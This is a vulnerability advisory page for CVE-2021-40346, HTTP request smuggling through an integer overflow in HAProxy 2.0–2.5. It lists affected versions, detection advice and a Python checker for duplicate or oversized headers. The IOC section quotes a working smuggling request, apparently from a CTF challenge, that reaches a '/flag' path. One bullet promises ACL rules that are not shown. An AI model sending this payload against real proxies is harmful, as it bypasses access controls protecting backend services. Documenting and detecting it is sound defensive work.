CVE-2021-40346
published 2021-09-08


Priority: P2, 61, high
CVSS 3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
EPSS: 56.08% (98.9th percentile)
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.

Affected (13 ranges)

vendor | product | version range | fixed in
debian | debian_linux | - | -
debian | haproxy | < haproxy 2.2.16-3 (bookworm) | haproxy 2.2.16-3 (bookworm)
fedoraproject | fedora | - | -
fedoraproject | fedora | - | -
haproxy | haproxy | - | -
haproxy | haproxy | >= 0 < 2.2.9-2+deb11u2 | 2.2.9-2+deb11u2
haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3
haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3
haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3
haproxy | haproxy | >= 2.0.0 < 2.0.25 | 2.0.25
haproxy | haproxy | >= 2.2.0 < 2.2.17 | 2.2.17
haproxy | haproxy | >= 2.3.0 < 2.3.14 | 2.3.14
haproxy | haproxy | >= 2.4.0 < 2.4.4 | 2.4.4

Detection & IOCs (extracted from sources)

Observed header (IOC): Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Observed request (IOC): POST / HTTP/1.1 Host: door-unlocked.chal.intentsummit.org:8000 Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 22 GET /flag HTTP/1.1 h:GET / HTTP/1.1 Host: door-unlocked.chal.intentsummit.org:8000
  • Detect duplicate Content-Length headers in HTTP requests or responses; the exploit relies on injecting a second Content-Length header to smuggle requests past HAProxy ACLs.
  • The attack vector is an oversized, padded Content-Length header name (e.g., 'Content-Length' followed by hundreds of 'a' characters and a colon) used to trigger the integer overflow in htx_add_header, causing HAProxy to accept a second Content-Length and smuggle a request.
  • The vulnerable function is htx_add_header in HAProxy 2.0 through 2.5; monitor for integer overflow conditions in HTTP header name length parsing.
  • The root cause is incorrect handling of HTTP header name length encoding; look for abnormally long header names in HTTP requests as a detection signal.
  • Add the following HAProxy ACL rules to block requests/responses with more than one Content-Length header as a mitigation for CVE-2021-40346.
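As an added example (not code from the page's sources or from HAProxy), a small Python checker that applies the two detection signals listed above, duplicate Content-Length headers and abnormally long header names, to raw HTTP/1.x request heads. The 64-character name threshold and the three sample requests are constructed assumptions; the padded sample is shaped after the IOC quoted above.

```python
from typing import List, Optional, Tuple

# Assumed threshold for a "normal" header name; tune to observed traffic.
MAX_HEADER_NAME_LEN = 64

def parse_headers(raw: bytes) -> List[Tuple[str, Optional[str]]]:
    """Split a raw HTTP/1.x request head into (name, value) pairs.
    Only the block before the first blank line is inspected; a line
    without a colon is kept with value None so it is not silently dropped."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            headers.append((line.decode("latin-1"), None))
        else:
            headers.append((name.decode("latin-1"), value.strip().decode("latin-1")))
    return headers

def inspect_request(raw: bytes, max_name_len: int = MAX_HEADER_NAME_LEN) -> List[str]:
    """Return detection findings for one raw request; an empty list means clean."""
    headers = parse_headers(raw)
    findings = []
    # Signal 1: more than one Content-Length header (case-insensitive compare).
    cl_count = sum(1 for name, _ in headers if name.strip().lower() == "content-length")
    if cl_count > 1:
        findings.append(f"duplicate Content-Length ({cl_count} occurrences)")
    # Signal 2: abnormally long header names, the shape used to reach the overflow.
    for name, _ in headers:
        if len(name) > max_name_len:
            findings.append(f"oversized header name ({len(name)} chars): {name[:20]}...")
    return findings

# Constructed sample requests (not captured traffic).
BENIGN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n\r\nhello"
DUP_CL = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Length: 5\r\nContent-Length: 22\r\n\r\nhello")
# Shaped after the IOC: 'Content-Length0' padded with 256 'a's, then a real Content-Length.
PADDED = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
          + b"Content-Length0" + b"a" * 256 + b":\r\n"
          + b"Content-Length: 22\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("dup_cl", DUP_CL), ("padded", PADDED)):
        print(label, inspect_request(sample) or "clean")
```

The padded sample raises only the oversized-name finding, because the padded name is not literally "Content-Length"; both signals are needed to cover the variants the bullets describe.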

CVSS provenance

source | version | score | severity | vector
nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N
osv | - | 7.5 | HIGH | -
vendor_debian | - | 7.5 | HIGH | -
vendor_redhat | - | 7.5 | HIGH | -